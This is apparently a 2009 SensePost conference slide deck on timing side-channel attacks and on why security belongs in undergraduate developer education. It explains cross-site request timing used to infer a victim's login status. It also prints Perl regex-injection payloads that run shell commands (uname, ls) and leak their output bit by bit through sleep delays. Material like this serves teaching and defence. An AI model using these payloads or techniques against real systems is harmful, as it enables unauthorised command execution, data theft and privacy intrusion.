On Timing and Teaching

marco slaviero

SensePost 2009

Who we are.. SensePost

Formed in 2001 Security assessment services to finance,

industrial, mining, telecoms Written a few papers.. Spoken at a number of conferences Contributed to a handful of books Done some Training

www.sensepost.com/blog

Agenda Who we are What this talk is about Background Timing vulnerabilities Timing channels Developers need our help Conclusion / Questions

Main thrust Message from users There is a gap between what implementers

know, and what they face with respect to security

Industry is failing to address this Universities are uniquely positioned to help

For fun, let’s frame it with with respect to timing attacks Received significant academic attention Allows for new demos :)

Stepping Back a Little

An illustrious history of side channel attacks on computing systems

differential power analysis hardware

EM radiation emission analysis hardware

timing analysis software/hardware

Traditional Timing Timing has received lots of attention over

the years in the area of crypt-analysis Kocher [1996]

1st local results against RSA and DH Brumley & Boneh [2003]

Derived partial RSA over network due to weaknesses in OpenSSL

Bernstein [2004] Derived full AES key across custom network clients

Percival [2005] L1 cache access times could be used on HT processors to

derive RSA key bits

Web Time Felten & Schneider [2000]

early results on timing and the web focused on privacy

browser cache snooping dns cache snooping

Grossman & Niedzialkowski [2006] SPI Dynamics [2006]

Both released a JavaScript port scanner using JS’s onerror feature. Implicitly uses timing attacks (connection timed out, hence it is closed)

Bortz, Boneh & Nandy [2007] Direct timing (valid usernames, hidden gallery sizes) Cross Site Timing

<img onerror=xxxxx>

All that research == solved, right?

In a perfect world, the pioneer work on timing should be reflected in today’s systems

Making the jump Username enumeration can be a significant

issue

*really* useful in certain circumstances But what if the application returns a standard

error page?

Happened last week…

Application could authenticate users itself (local DB) or against a configured AD

Local lookup is fast AD lookup is across the network

http://localhost/apache2-default/username_enumeration.swf

Timing and Privacy JavaScript portscanning Using CSS to determine if links were visited. Ed Felten in 2000 examined the dangers of

Java and Timing to users Privacy by timing load times.

• Felten’s 2000 Timing Attack on Privacy.

X.S.R.T

Cross Site Request Timing.. Simply:

1. Victim visits attackers website2. JavaScript causes Victims browser to surf to

http://www.facebook.com/friends.php?r3. JavaScript determines load time, to decide if

user is (or isnt logged in) (> 50ms - user logged in)

Problem: This doesn’t work the same for U.S victims and .ZA victims! (.za adds 100ms just by default!)

X.S.R.T We introduced the concept of a base-

page1. Fetch page available to both Logged-in and

Logged-out users (base-page) (X Seconds)2. Fetch the page available only to Logged-in

users (Y Seconds)3. Calculate X/Y

• This gives us a latency resistant method of determining logged-in/logged-out status

So serious? C’mon, those are binary decisions, where’s

the real harm? It’s inference only. (Apart from SPAMmer mining)

They were timing *vulnerabilities* What about using timing as a channel?

Web app provides an interface

A “secure” box from a network hardening point of view..

Only a single search page exposed

$search_term = $user_input;if($recordset =~ /$search_term/ig)

do_stuff();

Perl timing Regex injection

(?{`uname`;}) We can also make execution pause

(?{`sleep 20`;}) Now vary the pause and infer data

(?{`perl -e 'sleep(ord(substr(qx/uname/, 0,1)))'`;}) Finally, pause in one branch of a conditional

and extract a bit at a time (max 8*pause)(?{`perl -e

'sleep(substr((unpack('B32',pack('N',ord(s ubstr(qx/ls/, 0, 1))))), 24,1) * 2)'`;})

So, for all the research, we still find timing issues and can communicate

over timing channels

(Of course, this IS NOT limited to timing work)

Feel the application development pain (architect on down) Not exposed to security thinking in formative

years Devs struggling to bolt-on the knowledge Battling to counteract the latest exploit

Always one step behind

Fundamental knowledge clearly available in academic circles

Why are devs hurting so much? Deficient dev lifecycle

Security testing != secure software Inadequate design

Crypto Data flow

Knowledge Spot the bug Fixing takes clue Crypto != basic knowledge

Security fail

Where security education should occur Premise:

We depend on well-written programs Security is fundamental to well-written programs Not equivalent to learning libraries or frameworks

I argue: Industry has failed at this As important as compilers / graphics / AI Undergraduate level Defensive thinking techniques Practical examples help, but goal is NOT to train

hackers or push exploits

Prioritised wishlist for undergrads1. Secure coding techniques

Never trusting user input Exposure to common attack vectors Realising the power of the return code

2. Threat modeling (attack trees etc.) Powerful pen-and-paper technique for exposing design flaws

3. Destructive testing Reward resilient applications

4. SDLC modifications For the software engineers, realisation that a sole security

check before deployment is like reading a manual on the Waltz on the morning of your wedding

5. Security libraries Introduction to common libs

How can we help? Have a fair idea of what’s going wrong Improving security education could be a joint

effort Your expertise is in security theory, education,

curriculum development etc. We (industry) break systems, giving current

relevant insight Contact us with ideas (we have a few of our

own)

Conclusion. Timing attacks received much academic

attention We still find them day-to-day, something is

missing Security not core to developer education Include security in undergrad!

Really, talk to us, we want to get involved.

Questions ???

marco@sensepost.comwww.sensepost.com/blog